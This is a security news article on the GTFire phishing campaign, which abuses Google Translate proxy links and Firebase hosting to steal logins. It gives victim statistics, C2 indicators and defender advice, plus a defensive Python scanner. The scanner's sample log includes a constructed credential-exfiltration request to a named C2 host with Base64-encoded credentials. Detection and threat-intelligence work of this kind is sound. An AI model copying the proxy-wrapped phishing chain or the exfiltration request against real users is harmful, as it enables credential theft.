GTFire Phishing Campaign Abuses Google Firebase and Translate for Credential Theft


GTFire phishing scheme uses Google Translate and Firebase to steal login credentials worldwide. Attackers hide behind trusted Google domains to bypass email filters and security gateways. Victims enter details on fake brand pages, then get redirected to real sites unaware of the theft.

Group-IB uncovered this operation targeting over 1,000 organizations across 100+ countries. Servers exposed thousands of stolen credentials from 200+ industries. Mexico tops the list with 385 victims in manufacturing, education, and government sectors. The US follows with 101 cases.

Phishers reuse templates for brands with small tweaks. Pages collect credentials in steps. Data sorts by date, language, and service on central servers. Over 120 domains use random names for quick swaps.

Links start with translate.goog URLs. These relay through Google’s proxy to Firebase *.web.app phishing sites. Legit Google domains dodge blocks. Pages mimic brands perfectly with dynamic logos.

GTFire phishing scheme (Source – Group-IB)

Victims type credentials. Pages show fake “wrong password” errors to grab second tries too. Data hits C2 servers via GET requests with Base64 passwords plus country and browser info. LiteSpeed servers run All-in-1.php scripts.

Victim Distribution

Country     Victims   Top Sectors
Mexico      385       Manufacturing, Education, Government
USA         101       Various
Spain       67        Various
India       54        Various
Argentina   50        Various

GTFire phishing scheme global victimology (Source – Group-IB)

Redirects to real sites delay detection. Traditional filters miss Google-hosted phishing. Rapid subdomain rotation beats blocklists.

GTFire infrastructure (Source – Group-IB)

Attack Flow

  • Phishing email with translate.goog link.
  • Routes to Firebase *.web.app fake login.
  • Victim submits credentials twice via error loop.
  • Data to C2: jnhwzs.fyi, gnpnia.lat.
  • Silent redirect to legit brand site.

Phishing pages use fake error prompts (Source – Group-IB)
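As an added example (not code from the Group-IB report or from this article), the Python script below shows one way a defender can hunt for this chain in web-proxy logs: it reverses the translate.goog hostname encoding to recover the proxied origin, flags origins on Firebase *.web.app hosting, matches the C2 hosts and the All-in-1.php collector script named above, and decodes Base64-looking query values so an analyst can see what was exfiltrated. The log lines, the hostname login.acme-portal.web.app and the query parameter names u/p/c/b are constructed for the example; the report does not give the real parameter names, and the hyphen-encoding rule for translate.goog hostnames is a documented behaviour of the Translate proxy rather than something stated in the article.

```python
import base64
import binascii
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlparse

# C2 hostnames and collector script name as reported by Group-IB.
KNOWN_C2_HOSTS = {"jnhwzs.fyi", "gnpnia.lat"}
COLLECTOR_SCRIPT = "All-in-1.php"

# Constructed proxy-log sample (not real traffic): "<time> <client> <method> <url>".
# Hostnames and the u/p/c/b parameter names are invented for the example.
SAMPLE_PROXY_LOG = """\
10:01:02 10.0.0.5 GET https://login-acme--portal-web-app.translate.goog/index.html?_x_tr_sl=auto&_x_tr_tl=en
10:01:09 10.0.0.5 GET https://jnhwzs.fyi/All-in-1.php?u=am9obi5kb2U%3D&p=UEBzc3cwcmQh&c=MX&b=Chrome
10:02:44 10.0.0.7 GET https://www-example-org.translate.goog/news
10:03:10 10.0.0.9 GET https://docs.python.org/3/
"""


def decode_translate_proxy_host(host: str) -> Optional[str]:
    """Reverse the Translate proxy's hostname encoding.

    translate.goog rewrites the origin host: each '.' becomes '-' and each
    original '-' becomes '--', so 'login.acme-portal.web.app' is served as
    'login-acme--portal-web-app.translate.goog'. Returns None for other hosts.
    """
    host = host.lower()
    suffix = ".translate.goog"
    if not host.endswith(suffix):
        return None
    label = host[: -len(suffix)]
    # Split on the doubled hyphen first so literal hyphens survive, then map '-' back to '.'.
    return "-".join(part.replace("-", ".") for part in label.split("--"))


def try_base64_text(value: str) -> Optional[str]:
    """Return the decoded text if value is strict Base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def classify_url(url: str) -> Dict:
    """Score one URL against the GTFire chain: proxy wrapper, Firebase target, C2, collector."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    origin = decode_translate_proxy_host(host)
    reasons: List[str] = []
    decoded: Dict[str, str] = {}

    if origin is not None:
        reasons.append("translate.goog proxy wrapper")
        if origin.endswith(".web.app"):
            reasons.append("proxied target is Firebase hosting (*.web.app)")
    elif host.endswith(".web.app"):
        reasons.append("Firebase hosting (*.web.app)")

    if (origin or host) in KNOWN_C2_HOSTS:
        reasons.append("known GTFire C2 host")

    if parsed.path.rsplit("/", 1)[-1] == COLLECTOR_SCRIPT:
        reasons.append("All-in-1.php collector endpoint")
        # The report says credentials travel in GET parameters with Base64 passwords;
        # decode whatever decodes cleanly so the analyst sees the captured values.
        for key, value in parse_qsl(parsed.query):
            text = try_base64_text(value)
            if text is not None:
                decoded[key] = text
        if decoded:
            reasons.append("Base64-encoded query values")

    # A bare Translate wrapper is common in legitimate use, so it alone stays "low".
    if "known GTFire C2 host" in reasons or len(reasons) >= 2:
        verdict = "high"
    elif reasons:
        verdict = "low"
    else:
        verdict = "clean"
    return {"url": url, "host": host, "origin": origin,
            "verdict": verdict, "reasons": reasons, "decoded": decoded}


def scan_log(log_text: str) -> List[Dict]:
    """Return the non-clean findings for each '<time> <client> <method> <url>' line."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        result = classify_url(fields[3])
        if result["verdict"] != "clean":
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_PROXY_LOG):
        print(finding["verdict"].upper(), finding["url"])
        for reason in finding["reasons"]:
            print("   -", reason)
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

Run against the constructed log, the Translate-wrapped Firebase login page and the All-in-1.php request to jnhwzs.fyi both come back "high", the ordinary Translate-wrapped news site comes back "low", and the docs.python.org line is dropped as clean. Matching on the decoded origin rather than the visible translate.goog host is the point: a blocklist keyed on the literal hostname never sees the *.web.app target.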

Deploy phishing-resistant MFA everywhere. Train staff on translate.goog + Firebase patterns. Monitor cloud platforms for brand fakes. Share IOCs with CERT teams.

FAQ

What services does GTFire abuse?

Google Translate (translate.goog) and Firebase (*.web.app subdomains).

How many victims by country?

Mexico 385, US 101, Spain 67, India 54, Argentina 50.

What tricks pages use?

Fake “wrong password” to capture two credential sets.

C2 indicators?

jnhwzs.fyi, gnpnia.lat; All-in-1.php scripts.

How to block GTFire?

MFA, train on Google URL patterns, monitor Firebase abuse.
